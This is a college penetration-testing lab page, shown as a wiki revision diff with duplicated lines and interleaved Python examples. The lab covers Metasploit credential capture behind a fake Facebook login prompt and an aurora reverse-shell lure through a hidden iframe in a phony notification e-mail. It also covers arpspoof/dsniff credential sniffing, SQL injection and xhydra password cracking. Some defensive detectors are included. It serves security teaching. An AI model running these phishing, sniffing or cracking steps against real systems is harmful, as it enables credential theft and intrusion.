Difference between revisions of "SEC520/labs/Lab 4"

From CDOT Wiki

<h2> <span class="mw-headline">Objectives</span></h2>

<ol><li>Access a server by creating a webpage using the <b>&lt;iframe&gt;</b> tag to redirect a user to a <b>Metasploit exploit</b> in order to gain access to the computer system.
</li><li>Understand how <b>phishing</b> can be used to have the user inadvertently activate (trigger) HTML code to access a vulnerable server via a web-browser.
</li><li>Perform <b>IP Spoofing</b> (Man in the Middle) attacks in order to obtain useful information from a connection between computers.
</li><li>Access and manipulate a database server to gain access into the targeted server.
</li><li>Use a <b>password cracking program</b> to discover and access user accounts, and possibly root access.
</li></ol>

<p><br>
<h2> <span class="mw-headline">Required Materials (Bring to All Labs)</span></h2>

<ul>
<li> <b>SATA Hard Disk</b> (in removable disk tray).
</li><li> <b>Lab Logbook (Lab6 Reference Sheet)</b> (to make notes and observations).
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Prerequisites</span></h2>
<ul><li> [https://wiki.cdot.senecacollege.ca/wiki/SEC520/labs/Lab_3 SEC520 Lab 3]
</li></ul>
<p><br>
</p>
<h2> <span class="mw-headline">Online Tools and References</span></h2>

<ul>
<li>[http://www.ehacking.net/2011/10/metasploit-tutorials-from-beginner-to.html Metasploit Framework]</li>
<li>[http://linuxmanpages.com/man1/nmap.1.php nmap]</li>
<li>[http://www.irongeek.com/i.php?page=security/arpspoof arpspoof]</li>
<li>[http://arhodes505.awardspace.us/minituts/xhydra.htm xhydra]</li>
</ul>

<p><br>
</p>
<h2> <span class="mw-headline">Course Notes</span></h2>
<ul>
<li>[http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.odp odp] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.pdf pdf] | [http://cs.senecac.on.ca/%7Efac/sec520/slides/sec520_w7_l1.ppt ppt] (Slides: Types of Attacks)</li>
<li>[http://www.youtube.com/watch?v=ZUygX8TBBw0 Phishing] | [http://www.youtube.com/watch?v=PqfZM3Lxrmg Malicious Payload] | [http://www.youtube.com/watch?v=-hd7XG-b6uk IP Spoofing] | [http://www.youtube.com/watch?v=AhTfo6pWBIM Database Injection] | [http://www.youtube.com/watch?v=Iyh_w0Ix2bc Cracking Weak Passwords] (YouTube Videos)</li>
<li>[http://libcat.senecac.on.ca/vwebv/holdingsInfo?searchId=89542&amp;recCount=50&amp;recPointer=0&amp;bibId=315433 Penetration Tester's Open Source Toolkit (E-book)] (Chapters 4, 5, 6)</li>
</ul>

<p><br>
</p>
<h1> <span class="mw-headline">Performing Lab 4</span></h1>
<br>
{{Admon/caution|CAUTION!|Scanning ports and exploiting servers
require the permission of the Server Owner (preferably in writing). Students
must either use their VMs, use the IFS lab (if available), or sign an agreement to use the <b>Tank</b> server when practising these computer system intrusion methods.|}}
<br>

<h2> <span class="mw-headline">Task #1: Web-browser Redirect (Phishing) Attacks</span></h2>
<br>
This section will demonstrate the vulnerability of a computer system
with one of its weakest links: <i>Humans</i>. You will be using the <b>Metasploit</b> framework to create an attack on your server that will <i>exploit</i> and <i>gain access</i> to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
<br>
INSTRUCTIONS:
<br /><br />
Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the <b>Armitage</b> frontend, other strategies such as <i>lurking</i> to gain access (via reverse shell) by redirecting web-browser traffic are also available.
<br /><br />
In this section, we will be using the msfconsole to issue commands to exploit via the web-browser. Before we start, we should update our Metasploit Framework. In order to achieve this, we will update the older version of Metasploit that came with our Kali Linux edition with a new version:
<br /><br />
{{Admon/tip|Using The MSF Console|
<b>msfconsole</b> is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armitage!<br /><br />
We will be running the <b>msfconsole</b> command to access the command shell, and set up a typical phishing attack.
|}}
<br />
<ol>
<li>Log in as the <b>root</b> user, and issue the command: <b>msfconsole</b> (ignore the error; the console should eventually load). If problems persist, check to see if the Metasploit server is running.<br>
Next, we will be generating an attack payload (code) that can be executed from an html file (via a form button) to gain access to the computer system. Perform the following steps to create this payload (html) file:
<br /></li>
<li>In the <b>msfconsole</b>, issue the following commands:
<br /></li>
</ol>
<pre>
use auxiliary/server/capture/http_basic
show options
set REALM Facebook Gateway
set URIPATH /
run
</pre>
<ol>
<li value="3">Note the <b>LOCAL IP ADDRESS</b>. You will be entering that address in a web-browser on your targeted Windows server.</li>
<li>Your attack server (running Metasploit) is now "lurking" until the user enters data in a Windows dialog box.</li>
</ol>
 
{{Admon/important|Disable Internet Explorer Enhanced Security|

<ol>
<li value="5">Switch to your vulnerable Windows server, and make certain that you are logged in as <b>Administrator</b>.</li>
<li>Open the <b>Control Panel</b>, select <b>Add or Remove Programs</b>, select <b>Add/Remove Windows Components</b>. Click to select <b>Internet Explorer Enhanced Security Configuration</b> and click <b>Details</b>. Uncheck the checkboxes for admin and all other users and then click <b>Next</b>.</li>
<li>Log into a regular user account and open a web-browser.</li>
<li>Enter the IP ADDRESS for the attack web-site. Enter a username and password when prompted by the dialog box.</li>
<li>Now, switch to your attack machine (i.e. host), and you should see a notification of the exploit. Were you able to determine the username and password?</li>
<li>Did you think it would be harder to exploit a machine in this way?</li>
<li>How popular do you think this type of human-based attack is?</li>
<li>How can you prevent this type of attack from occurring on a "hardened system"?</li>
<li>Record your findings in your lab log-book.</li>
</ol>

<br /><br />
Here is how simple (subtle) it can be:<br /><br />

<ol>
<li>Perform a Google search to use msfconsole to set up a "reverse shell attack" by entering the console commands:<ul><li>use windows/browser/ms10_002_aurora</li><li>set generic/shell_reverse tcp</li><li>set LHOST (your attack host IP ADDRESS)</li><li>set URIPATH /</li><li>set LPORT 7371</li><li>set SRVPORT 80</li><li>exploit</li></ul></li><li>Create a "phony" facebook notification for the "targeted" user on the system (this is where the reconnaissance (information gathering) phase comes in handy, such as e-mail usernames and facebook accounts).</li>
<li>Here is a link to sample HTML code: [https://scs.senecac.on.ca/%7Efac/sec520/labs/email-attachment-template.html.txt Template of e-mail attachment]</li>
<li>Edit the file to contain the following iframe (that will draw the user to your attack website):<br><br>
<pre> &lt;iframe src="ATTACK_SERVER_IP_ADDRESS" width="100" height="0"&gt; &lt;/iframe&gt;
</pre></li>
<li>We could then send this HTML file via an e-mail to the user (in this case masquerading as a facebook notification). You could simulate this attack for demonstration by creating the html file on your Windows server, and loading this file with a web-browser (like Internet Explorer).<br /><br />Another approach would be to send a "phony" notification with links to the facebook "login" page with the &lt;iframe&gt; element.</li>
</ol>

|}}

<br />
<ol>
<li value="14">Proceed to Task #2</li>
</ol>

<p><b>Answer the Task #1 observations / questions in your lab log book.</b>
</p>
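One answer to the "hardened system" question above is to inspect incoming HTML mail for the trick this task relies on: an iframe the reader cannot see. The scanner below is an added example written for this page (it is not part of the lab or the linked template); it uses only the Python standard library and a constructed sample message, and it flags iframes with a zero width or height, a hiding style, or a bare IP address as the src, which is exactly the shape of the tag in step 4.

```python
"""Flag hidden <iframe> elements in an HTML e-mail body.

Added example (not from the lab page): scans a constructed HTML message for
iframes that are invisible to the reader (zero height/width, display:none,
visibility:hidden) or that point at a bare IP address instead of a host name.
"""
from html.parser import HTMLParser
import re

# Matches src values such as "192.0.2.10", "http://192.0.2.10/" or "http://192.0.2.10:80/x"
_BARE_IP = re.compile(r"^(?:https?://)?\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)")


def _is_zero(value):
    """True when an HTML size attribute is zero (e.g. "0", "0px"); None means absent."""
    if value is None:
        return False
    digits = re.match(r"^\s*(\d+)", value)
    return digits is not None and int(digits.group(1)) == 0


class IframeScanner(HTMLParser):
    """Collects one finding per suspicious <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":          # HTMLParser already lower-cases tag names
            return
        a = {name: (value or "") for name, value in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_is_zero(a.get("height")) or _is_zero(a.get("width"))
                  or "display:none" in style or "visibility:hidden" in style)
        src = a.get("src", "").strip()
        reasons = []
        if hidden:
            reasons.append("hidden")
        if _BARE_IP.match(src):
            reasons.append("bare-ip-src")
        if reasons:
            self.findings.append({"src": src, "reasons": reasons})


def scan_html(html):
    """Return a list of {"src": ..., "reasons": [...]} for every suspicious iframe."""
    scanner = IframeScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample modelled on the lab's "notification" e-mail: the first iframe
# is the hidden redirect, the second is an ordinary embedded video and is not flagged.
SAMPLE = """<html><body>
<p>You have 3 new notifications.</p>
<iframe src="http://192.0.2.10/" width="100" height="0"> </iframe>
<iframe src="https://www.example.com/video" width="400" height="300"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE):
        print(finding)
```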
<p><br>
This section will demonstrate an <b>IP Spoofing</b> attack (sometimes
referred to as <i>"arp poisoning"</i>) where the target server is "tricked"
into communicating with a server that it assumes has the correct MAC
address. The attacker can then <b>"feed packets"</b> to the destination, allowing for an uninterrupted session to obtain information such as usernames and passwords.
<br><br>
INSTRUCTIONS:
</p><ol>
<li>We will be using your <b>Kali Linux</b> host machine, <b>Vulnerable Windows VM</b>, and <b>Vulnerable Linux VM</b> for this section.</li>
<li>Note the IP Address of your Windows server.
</li><li>Make certain that your Windows machine is running an FTP
server. Set up the FTP server to only allow users to access the FTP
server by username and password (possibly not required from default installation and startup).</li>
<li>For demonstration purposes of this "man in the middle" attack, open a command prompt, and issue the following MS-Windows command: <b>ping LINUX_IP_ADDR -t</b><br /><br />You should now see proof of a connection between your vulnerable Windows and Linux servers.</li>
<li>Switch to your vulnerable Linux server, open a shell terminal, and note the IP Address of your vulnerable Linux server.</li>
<li>Open another shell terminal, and issue the following Linux command to continuously "ping" the Windows server: <b>ping WINDOWS_IP_ADDR</b></li>
<li>We will now trick the Windows server into thinking that the attack (Kali Linux or "host") server is the destination server.</li>
<li>Switch to your Kali Linux (host) server, and open a shell terminal.</li>
<li>While in the host (attack) machine, issue the following Linux command:<br /><br /> <b>sudo arpspoof -t  &nbsp;&nbsp; WINDOWS_IP_ADDR  &nbsp;&nbsp; LINUX_IP_ADDR</b><br><br> </li>
<li>We need to continue the "man in the middle" attack by now
performing the same manoeuvre for the Linux VM. While still in the host (attack) machine, open another shell terminal and issue the following
Linux command: <br><br><b>sudo arpspoof -t &nbsp;&nbsp; LINUX_IP_ADDR  &nbsp;&nbsp; WINDOWS_IP_ADDR</b><br><br></li>
<li>Switch first to your vulnerable Windows machine to view the pings. What do you notice? Do the same for your vulnerable Linux machine. Record your findings in your lab log-book.<br /><br /></li>
</ol>
  
<br>

<ol>
<li value="12">To complete the "man in the middle" attack, you are required to establish <b>IP FORWARDING</b>. Open another shell window in your host (attack) machine, and issue the following Linux commands in your attack host:<br><br><b>sudo su</b>  &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # login with admin password<br /><b> echo 1 &gt; /proc/sys/net/ipv4/ip_forward</b><br><br>(This means to set IP FORWARDING to "True" or "On")<br><br></li>
<li>Switch to your vulnerable Windows and Linux machines. Is the connection (using the ping command) re-established? Record your findings in your lab log-book.<br /><br /></li>
</ol>

{{Admon/important|Obtaining Username / Password Information|One of the main reasons for a <b>"man in the middle" attack</b> is to obtain sensitive information such as a username and password for further exploitation. A <b>Packet Sniffer</b> is a useful tool when using a "man in the middle attack". Throughout your journey in the area of Internet Security, you will soon learn there
is an abundance of tools, many of which do the same thing (including packet sniffers). For the remainder of this section we will use a packet sniffer tool called <b>dsniff</b>.|}}

<br>

<ol>
<li value="14">In an available shell terminal on your host (attack) server, issue the following Linux command: <b>dsniff</b><br />(<b>tip:</b> Use the command: <b>find -P . | grep dsniff</b> to locate the dsniff superuser executable)</li>
<li>This packet sniffer program will lurk until a user from the Linux VM establishes a connection with the Windows VM FTP SERVER.</li>
<li>Switch to your vulnerable Linux server, and establish an FTP connection with the Windows FTP server.</li>
</ol>

{{Admon/important|FTP Doesn't Work / Alternative Arp Poisoning Method|

<ol>
<li value="17">Then switch back to your host (attack) server.</li>
<li>What do you notice? Is this information sufficient to log on as a Windows system user? Record your findings in your lab log-book.</li>
<li>Return to your vulnerable Linux server, and close the FTP connection with the Windows server.</li>
<li>Switch back to your attack server. What information does <b>dsniff</b> provide?</li>
<li>What steps would a security analyst implement in order to reduce the possibility of a "man in the middle" attack?</li>
<li>Record your findings/answers in your lab log-book.</li>
<li>Proceed to Task #3</li>
</ol>

<p><b>Answer Task #2 observations / questions in your lab log book.</b>
</p><p><br>
</p>
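Part of the analyst's answer to question 21 is that the attack in steps 9 and 10 leaves a visible trace on the wire: each victim's IP is suddenly announced by a new MAC, and one MAC ends up answering for both victims. The detector below is an added example written for this page (not part of the lab or of dsniff/arpspoof); it parses constructed lines written in the style of tcpdump's ARP output, with made-up RFC 5737 addresses and MACs, and raises an alert for each of those two symptoms.

```python
"""Spot ARP cache poisoning from a stream of ARP replies.

Added example (not from the lab page). Parses constructed lines in the style of
tcpdump's ARP output and raises two kinds of alert:
  * "mac-changed": an IP address is suddenly announced by a different MAC
  * "mac-claims-multiple-ips": one MAC answers for several IPs, which is what an
    attacker impersonating both ends of a conversation produces
"""
import re
from collections import defaultdict

# "ARP, Reply 192.0.2.20 is-at aa:aa:aa:aa:aa:01" -> (ip, mac); requests are ignored
_REPLY = re.compile(r"ARP, Reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9A-Fa-f:]{17})")


def parse_replies(lines):
    """Return (ip, mac) pairs, MAC lower-cased, for every ARP reply line."""
    pairs = []
    for line in lines:
        m = _REPLY.search(line)
        if m:
            pairs.append((m.group(1), m.group(2).lower()))
    return pairs


def detect_poisoning(lines, min_ips_per_mac=2):
    """Return alert tuples in the order they were raised."""
    current = {}                    # ip -> MAC most recently announced for it
    ips_by_mac = defaultdict(set)   # mac -> every IP it has answered for
    alerts = []
    for ip, mac in parse_replies(lines):
        ips_by_mac[mac].add(ip)
        previous = current.get(ip)
        if previous is not None and previous != mac:
            alerts.append(("mac-changed", ip, previous, mac))
        current[ip] = mac
    for mac, ips in ips_by_mac.items():
        if len(ips) >= min_ips_per_mac:
            alerts.append(("mac-claims-multiple-ips", mac, tuple(sorted(ips))))
    return alerts


# Constructed capture: the two VMs answer normally, then a third MAC announces both IPs.
SAMPLE = [
    "12:00:01.000 ARP, Reply 192.0.2.20 is-at aa:aa:aa:aa:aa:01, length 28",
    "12:00:01.010 ARP, Reply 192.0.2.30 is-at bb:bb:bb:bb:bb:02, length 28",
    "12:00:05.000 ARP, Request who-has 192.0.2.30 tell 192.0.2.20, length 28",
    "12:00:06.000 ARP, Reply 192.0.2.30 is-at cc:cc:cc:cc:cc:03, length 28",
    "12:00:06.050 ARP, Reply 192.0.2.20 is-at cc:cc:cc:cc:cc:03, length 28",
]

if __name__ == "__main__":
    for alert in detect_poisoning(SAMPLE):
        print(alert)
```

Static ARP entries on the two VMs, or a switch feature such as dynamic ARP inspection, stop the cache from being rewritten in the first place; this detector is the monitoring side of that answer.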
  
INSTRUCTIONS:

<ol>
<li>Study the following PHP code below: </li>
</ol>

<pre> &lt;?php

$user = $_POST['usr'];

// Suppose the form field contains:  anything' OR 'x'='x
$user = "anything' OR 'x'='x";

// The value is pasted straight into the SQL string, so the quote in the
// input closes the literal and the OR clause becomes part of the query:
//   SELECT user,password FROM users WHERE user='anything' OR 'x'='x'
mysql_query("SELECT user,password FROM users WHERE user='$user'");

?&gt;
</pre>

<br>

<ol>
<li value="2">How could this code be incorporated with an HTML document (using a form) to perform a <b>database injection</b> attack? Record your answer in your lab log-book.</li>
<li>View the associated <b>YouTube</b> video in the resources above, and try to briefly explain why this type of attack could work. Write your explanation in your lab log-book.</li>
<li>Now, make the following editing changes to your saved database form (areas to be changed are displayed in bold, red colour):</li>
</ol>

<pre> &lt;?php

$user = <span style="color:red;font-weight:bold">mysql_real_escape_string(</span>$_POST['usr']<span style="color:red;font-weight:bold">)</span>;

// The same input, anything' OR 'x'='x, is now escaped before use, so
// $user holds:  anything\' OR \'x\'=\'x
// and the quotes no longer terminate the string literal in the query:
//   SELECT user,password FROM users WHERE user='anything\' OR \'x\'=\'x'
mysql_query("SELECT user,password FROM users WHERE user='$user'");

?&gt;
</pre>

<ol>
<li value="5">Try to explain how this last editing session prevented this SQL injection attack. Record your observations/answers in your lab log-book.</li>
<li>Proceed to Task #4.</li>
</ol>

<p><b>Answer Task #3 observations / questions in your lab log book.</b>
</p><p><br>
</p>
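The same injection replayed against a throwaway SQLite database, as an added example written for this page rather than code from the lab. It builds the lab's SELECT two ways: by string concatenation, as the PHP snippet does, and with a bound parameter, which is a different mechanism from the escaping shown in step 4 (the driver sends the value separately from the SQL text, so there is no quoting to get wrong). The table contents and user names are constructed.

```python
"""The lab's injection replayed against an in-memory SQLite database.

Added example (not from the lab page). Compares what the query returns for the
lab's input when the value is concatenated into the SQL text versus bound as a
parameter. The users table and its rows are constructed for the demonstration.
"""
import sqlite3

# The value the lab feeds through $_POST['usr']
PAYLOAD = "anything' OR 'x'='x"


def make_db():
    """Create a constructed users table with three rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (user TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2"), ("weak", "password")])
    return con


def lookup_concat(con, user):
    """Vulnerable: the submitted quote closes the literal and the rest runs as SQL."""
    sql = "SELECT user,password FROM users WHERE user='" + user + "'"
    return con.execute(sql).fetchall()


def lookup_param(con, user):
    """Hardened: the value is bound as a parameter and can only be compared as data."""
    return con.execute("SELECT user,password FROM users WHERE user=?", (user,)).fetchall()


def demo(user=PAYLOAD):
    """Return both result sets for the given input so they can be compared."""
    con = make_db()
    try:
        return {"concat": lookup_concat(con, user), "param": lookup_param(con, user)}
    finally:
        con.close()


if __name__ == "__main__":
    for mode, rows in demo().items():
        print(mode, rows)
```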
  
INSTRUCTIONS:

<ol>
<li>Go to your vulnerable Windows server, create a username called <b>weak</b> that contains a very weak password (no special characters, just words that could be contained in a dictionary).</li>
<li>How could you obtain usernames (eg. e-mail usernames) for a targeted computer system? (review your labs and notes from the Reconnaissance Phase). Record your answer in your lab log-book.</li>
<li>Assume that you have obtained a username (i.e. username: <b>weak</b>) from the reconnaissance phase. We will now be using a tool to gain access to the account on the targeted Windows server.<br /><br /></li>
</ol>

{{Admon/important|Cain Password Dictionary|A password cracking program requires a dictionary of common passwords. The file <b>cain.txt</b> is a popular dictionary of typical or common passwords that can be used to test for weak passwords on a server.|}}
<br>

<ol>
<li value="4">We need to download a dictionary file containing many of the weak password combinations to help crack a user's weak password. You can perform a Net search in order to save this dictionary as a text file.<br /><br />Here is a link to various password cracking dictionaries: [http://www.skullsecurity.org/wiki/index.php/Passwords http://www.skullsecurity.org/wiki/index.php/Passwords]<br /><br />As root, download the compressed file (cain.txt.bz2) to your <b>/root</b> directory.<br /><br /></li>
<li>Decompress the file by issuing the following Linux command: <b>bunzip2 cain.txt.bz2</b><br /><br /></li>
</ol>

{{Admon/important|xhydra|xhydra is a graphical frontend of a program
that scans open ports, and attempts to crack account passwords that are
weak using a dictionary file of potential passwords. Of course, you
could have performed this task manually by using <b>nmap</b> to scan open ports, and use other password cracking tools (such as <b>Cain and Abel</b>), but <b>xhydra</b> performs these operations automatically.|}}
<br>

<ol>
<li value="6">To launch the xhydra application as root (unless you are already root), issue the following Linux command: <b>sudo xhydra</b><br /><br /></li>
<li>In the initial application window (i.e. <b>Target</b> tab), enter the <b>WINDOWS_IP_ADDR</b> in the <b>Target</b> textbox.</li>
<li>Under the <b>Protocol</b> list-box, select <b>ftp</b>.</li>
<li>In the <b>Output Options</b> section, check <b>Be verbose</b>, and check <b>Show Attempts</b>.</li>
<li>Move to the next screen by clicking on the <b>Passwords</b> tab.</li>
<li>In the <b>Username</b> section, type the username called <b>weak</b>.</li>
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li>
<li>In the <b>Password</b> section, click on the <b>passwords list</b> radio button, and then click on the <b>passwords list text-box</b> in order to browse to the <b>/root/cain.txt</b> dictionary (on your Kali Linux system) that contains common passwords that you downloaded and decompressed.</li>
+
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
<li>At the bottom of the screen, check <b>Try login as password</b>, and click <b>Try Empty Password</b>.</li>
+
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
<li>Click on the <b>Start</b> tab, and click on the <b>Start</b> button (at the bottom of the screen) to begin the attack.</li>
+
<li>This attack may take several minutes to complete.</li>
<li>This attack may take several minutes to complete.</li>
+
<li>Check the output from the Password Cracking Attempt. Did it list any usernames and passwords? If so, record the information in your lab log-book.<br><br></li>
<li>Check the output from the Password Cracking Attempt. Did it list  
 
any usernames and passwords? If so, record the information in your lab  
 
log-book.<br><br></li>
 
</ol>
 
 
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
 
{{Admon/important|Gaining Root Access|Once a penetration tester has access to a system as an unpriviledged user, there are methods to try to identify and gain access to an administrative account.<br /><br />
 
For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility).
 
For example with Linux systems, gaining access to the <b>/etc/passwd</b> file to list users with administrative privedges and gaining access to the <b>/etc/shadow</b> to attempt a crack the root password hash (via the <b>John the Ripper</b> utility).
 
|}}
 
|}}
 
<br>
 
<br>
<ol>
+
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
<li value="17">What sort of harm can be done to this organization if the <b>root</b> account has been hacked?</li>
+
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
<li>What sort of password rules should be used to make it harder to penetrate this system?</li>
+
 
</ol>
 
 
<br />
 
<br />
 
{{Admon/important|Sharpening Your Skills (hackthissite.org)|
 
{{Admon/important|Sharpening Your Skills (hackthissite.org)|
Line 312: Line 305:
 
|}}
 
|}}
 
<br />
 
<br />
<ol>
+
 
+
<li value="19">Record your findings in your lab log-book.</li>
<li value="19">Record your findings in your lab log-book.</li>
+
<li>Proceed to the "Completing the Lab".</li>
<li>Proceed to the "Completing the Lab".</li>
 
 
</ol>
 
</ol>
  
 
<p><b>Answer Task #4 observations / questions in your lab log book.</b>
 
<p><b>Answer Task #4 observations / questions in your lab log book.</b>
</p><p><br>
+
</p><p><br>
 
</p>
 
</p>
  
Line 327: Line 319:
 
</p>
 
</p>
 
<ol>
 
<ol>
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
+
<li>Proof of <b>Windows VM hack from Phishing / Malicious Code</b>.</li>
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
+
<li><b>Packet Sniffing</b> information from Linux to Windows FTP connection.</li>
<li>Demonstation of <b>prevention from Data Injection Attack</b>.</li>
+
<li>Demonstation of <b>prevention from Data Injection Attack</b>.</li>
<li>Completed Lab 4 notes.</li>
+
<li>Completed Lab 4 notes.</li>
 
</ol>
 
</ol>
 
<p><br>
 
<p><br>
Line 337: Line 329:
  
 
<ol>
 
<ol>
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
+
<li>Briefly explain the purpose of a <b>Phishing</b> Attack. How can phishing relate to using <b>malicious code</b>?</li>
<li>Define the term <b>Man in the Middle</b> attack.</li>
+
<li>Define the term <b>Man in the Middle</b> attack.</li>
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
+
<li>Briefly list the steps in a <b>Database Injection</b> attack.</li>
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
+
<li>How can a <b>dictionary file</b> be used to crack passwords on a targeted server?</li>
<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
+
<li>What is a <b>password hash</b>? How can a <i>password hash</i> be cracked?</li>
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
+
<li>What can an organization do to prevent passwords on their computer system from being cracked?</li>
 
</ol>
 
</ol>

Revision as of 16:18, 31 January 2018

Types of Attacks

Introduction


In the previous lab, you learned how to perform penetration testing on a vulnerable (target) server. You learned how to perform scanning and enumeration, and then ran vulnerability testing software (e.g. Metasploit) to gain access to your Windows server.

In this lab, students will learn other methods of vulnerability testing to gain access to vulnerable servers:

  • This lab will allow students to identify and practice common types of attacks that occur on targeted computer systems.
  • First, students will be exposed to Client-side attacks (usually initiated by the server's users) including Malicious web-page Payloads, and IP Spoofing (Man in the Middle) attacks.
  • Then, students will focus on Server-side attacks such as Server-side Injection, and Password attacks.



Objectives

  1. Access a server by creating a webpage using the <iframe> tag to redirect a user to a Metasploit exploit in order to gain access to the computer system.
  2. Understand how phishing can be used to have the user inadvertently activate (trigger) HTML code that gives access to a vulnerable server via a web-browser.
  3. Perform IP Spoofing (Man in the Middle) attacks in order to obtain useful information from a connection between two computers.
  4. Access and manipulate a database server to gain access into the targeted server.
  5. Use a password cracking program to discover and access user accounts, and possibly root access.


Required Materials (Bring to All Labs)

  • SATA Hard Disk (in removable disk tray).
  • Lab Logbook (Lab6 Reference Sheet) (to make notes and observations).


Prerequisites


Online Tools and References


Course Notes


Performing Lab 4


CAUTION!
Scanning ports and exploiting servers requires the permission of the server owner (preferably in writing). Students must either use their own VMs, use the IFS lab (if available), or sign an agreement to use the Tank server when practising these computer system intrusion methods.


Task #1: Web-browser Redirect (Phishing) Attacks


This section will demonstrate the vulnerability of a computer system with one of its weakest links: Humans. You will be using the Metasploit framework to create an attack on your server that will exploit and gain access to your target machine. You will also learn how you can redirect users to this attack site to deliver the malicious payload to that targeted computer.
INSTRUCTIONS:

Metasploit is a very versatile tool for penetration testing. In addition to gaining access to "targeted" computer systems by using the Armitage frontend, other strategies are available, such as "lurking" (waiting for the victim to connect) and gaining access via a reverse shell by redirecting web-browser traffic to the attack host.

In this section, we will be using msfconsole to issue the commands that set up a web-browser based attack. Before we start, we should update our Metasploit Framework, replacing the older version that came with our Kali Linux edition with the current version.

Using The MSF Console

msfconsole is a shell that allows penetration testers to issue commands when working with Metasploit. For example, IFS students in the degree program are expected to perform penetration testing more in the msfconsole than using Metasploit GUIs like Armitage!

We will be running the msfconsole command to access the command shell, and setup a typical phishing attack.


  1. Login as root user, and issue the command: msfconsole (ignore any startup warnings; the console should eventually load). If problems persist, check to see if the Metasploit server is running.
    Next, we will start a Metasploit capture server that presents the victim's browser with an HTTP Basic authentication prompt and records whatever username and password the user types into it. Perform the following steps to start it:
  2. In the msfconsole, issue the following commands:
		use auxiliary/server/capture/http_basic
		show options
		set REALM Facebook Gateway
		set URIPATH /
		run
	
  3. Note the IP address and port the capture server is listening on (the SRVHOST and SRVPORT values listed by show options). You will be entering that address in a web-browser on your targeted Windows server.
  4. Your attack server (running Metasploit) is now "lurking" until a browser connects and the user enters a username and password in the authentication dialog box.

Disable Internet Explorer Enhanced Security
In order to demonstrate this attack, we will disable Internet Explorer Enhanced Security. Perform the instructions below to disable this feature.


  5. Switch to your vulnerable Windows server, and make certain that you are logged in as Administrator.
  6. Open the Control Panel, select Add or Remove Programs, then select Add/Remove Windows Components. Select Internet Explorer Enhanced Security Configuration and click Details. Clear the checkboxes for administrators and for all other users, and then click Next.
  7. Log in to a regular user account and open a web-browser.
  8. Enter the IP address of the attack web-site. Enter a username and password when prompted by the dialog box.
  9. Now, switch to your attack machine (i.e. host), and you should see a notification from the capture module. Were you able to determine the username and password?
  10. Did you think it would be harder to exploit a machine in this way?
  11. How popular do you think this type of human-based attack is?
  12. How can you prevent this type of attack from occurring on a "hardened system"?
  13. Record your findings in your lab log-book.
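What the capture module is doing on the wire, as an added example (this is not code from the lab or from Metasploit): a minimal HTTP Basic-auth capture server and a scripted "victim" browser, both on loopback. The realm string matches the lab; the credentials and the client are constructed for the demo. The point to take away is that the Authorization header is only base64, not encryption, so whoever receives the request (the capture server here, or a sniffer in Task #2) reads the password directly.

```python
import base64
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import Request, urlopen

REALM = "Facebook Gateway"   # same value as "set REALM" in the lab


def decode_basic_auth(header):
    """Return (user, password) from an 'Authorization: Basic <b64>' value, or None.

    Basic auth is just base64("user:password"); there is no secrecy in it."""
    if not header:
        return None
    parts = header.split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    try:
        raw = base64.b64decode(parts[1], validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


class CaptureHandler(BaseHTTPRequestHandler):
    """Plays the role of auxiliary/server/capture/http_basic."""

    def do_GET(self):
        creds = decode_basic_auth(self.headers.get("Authorization"))
        if creds is None:
            # No credentials yet: challenge the browser, which pops up the login dialog.
            self.send_response(401)
            self.send_header("WWW-Authenticate", 'Basic realm="%s"' % REALM)
            self.end_headers()
            return
        # Credentials arrived in clear text; record them and send a bland page back.
        self.server.captured.append((self.client_address[0], self.path) + creds)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Login failed, please try again later.\n")

    def log_message(self, *args):
        pass  # keep the demo output quiet


def run_capture_demo(user, password):
    """Start the capture server on a free loopback port, act as the victim's browser,
    and return (the 401 challenge header, the list of captured credentials)."""
    srv = HTTPServer(("127.0.0.1", 0), CaptureHandler)
    srv.captured = []
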